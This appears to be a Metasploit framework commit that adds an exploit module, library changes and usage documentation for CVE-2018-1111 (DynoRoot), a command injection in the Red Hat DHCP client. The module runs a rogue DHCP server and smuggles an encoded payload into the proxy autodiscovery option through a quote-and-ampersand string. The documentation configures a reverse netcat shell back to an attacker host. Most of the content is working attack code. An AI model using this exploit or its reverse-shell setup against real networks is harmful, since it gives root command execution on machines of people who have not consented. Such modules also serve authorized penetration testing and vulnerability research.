Land #10059, CVE-2018-1111 exploit

documentation/modules/exploit/unix/dhcp/rhel_dhcp_client_command_injection.md

@@ -0,0 +1,25 @@
+## Verification
+
+- Setup CentOS virtual machine and Kali virtual machine
+- Ensure proper versions are in use. This was tested on `CentOS Linux release 7.4.1708 (Core)` with NetworkManager version `1.8.0-11.el7_4`
+- Create isolated custom network (e.g. 192.168.41.0/24)
+- Disable DHCP server on custom network for easier verification 
+- Start `msfconsole` on Kali Linux
+- `use exploit/unix/dhcp/rhel_dhcp_client_command_injection`
+- Configure `SRVHOST` and `NETMASK` required variables
+- Configure `PAYLOAD` and supporting options
+- Start the DHCP server
+- On CentOS 7 machine, request a new DHCP address. Assuming primary interface is `ens33`, you can use: `clear && nmcli conn down id "ens33" && nmcli conn up id "ens33" && ip addr show`
+- This should request a new DHCP from your server (if other DHCP servers exist, note that then this becomes a race condition often requiring DHCP NAK's to get your DHCP to win)
+
+Validated using RC File:
+
+```
+use exploit/unix/dhcp/rhel_dhcp_client_command_injection
+set SRVHOST 192.168.41.129
+set NETMASK 255.255.255.0
+set PAYLOAD cmd/unix/reverse_netcat
+set LHOST 192.168.41.2
+set LPORT 1337
+exploit -j -z
+```

lib/rex/proto/dhcp/constants.rb

@@ -23,6 +23,7 @@ OpDomainName = 15
 OpDns = 6
 OpHostname = 0x0c
 OpURL = 0x72
+OpProxyAutodiscovery = 0xfc
 OpEnd = 0xff
 
 PXEMagic = "\xF1\x00\x74\x7E"

lib/rex/proto/dhcp/server.rb

@@ -128,7 +128,7 @@ class Server
   def set_option(opts)
     allowed_options = [
       :serveOnce, :pxealtconfigfile, :servePXE, :relayip, :leasetime, :dnsserv,
-      :pxeconfigfile, :pxepathprefix, :pxereboottime, :router,
+      :pxeconfigfile, :pxepathprefix, :pxereboottime, :router, :proxy_auto_discovery,
       :give_hostname, :served_hostname, :served_over, :serveOnlyPXE, :domain_name, :url
     ]
 
@@ -154,7 +154,7 @@ class Server
   end
 
   attr_accessor :listen_host, :listen_port, :context, :leasetime, :relayip, :router, :dnsserv
-  attr_accessor :domain_name
+  attr_accessor :domain_name, :proxy_auto_discovery
   attr_accessor :sock, :thread, :myfilename, :ipstring, :served, :serveOnce
   attr_accessor :current_ip, :start_ip, :end_ip, :broadcasta, :netmaskn
   attr_accessor :servePXE, :pxeconfigfile, :pxealtconfigfile, :pxepathprefix, :pxereboottime, :serveOnlyPXE
@@ -292,12 +292,13 @@ protected
     end
 
     # Options!
+    pkt << dhcpoption(OpProxyAutodiscovery, self.proxy_auto_discovery) if self.proxy_auto_discovery
     pkt << dhcpoption(OpDHCPServer, self.ipstring)
     pkt << dhcpoption(OpLeaseTime, [self.leasetime].pack('N'))
     pkt << dhcpoption(OpSubnetMask, self.netmaskn)
     pkt << dhcpoption(OpRouter, self.router)
     pkt << dhcpoption(OpDns, self.dnsserv)
-    pkt << dhcpoption(OpDomainName, self.domain_name)
+    pkt << dhcpoption(OpDomainName, self.domain_name) if self.domain_name
 
     if self.servePXE  # PXE options
       pkt << dhcpoption(OpPXEMagic, PXEMagic)

modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb

@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::DHCPServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DHCP Client Command Injection (DynoRoot)',
+      'Description'    => %q{
+        This module exploits the DynoRoot vulnerability, a flaw in how the
+         NetworkManager integration script included in the DHCP client in
+         Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
+         processes DHCP options. A malicious DHCP server, or an attacker on
+         the local network able to spoof DHCP responses, could use this flaw
+         to execute arbitrary commands with root privileges on systems using
+         NetworkManager and configured to obtain network configuration using
+         the DHCP protocol.
+      },
+      'Author'         =>
+        [
+          'Felix Wilhelm', # Vulnerability discovery
+          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => true,
+      'References'     =>
+        [
+          ['AKA', 'DynoRoot'],
+          ['CVE', '2018-1111'],
+          ['EDB': '44652'],
+          ['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
+          ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
+          ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
+          ['URL', 'https://dynoroot.ninja/'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
+          ['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
+        ],
+      'Targets'        => [ [ 'Automatic Target', { }] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'May 15 2018'
+    ))
+
+    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
+  end
+
+  def exploit
+    hash = datastore.copy
+    start_service(hash)
+    @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
+
+    begin
+      while @dhcp.thread.alive?
+        sleep 2
+      end
+    ensure
+      stop_service
+    end
+  end
+end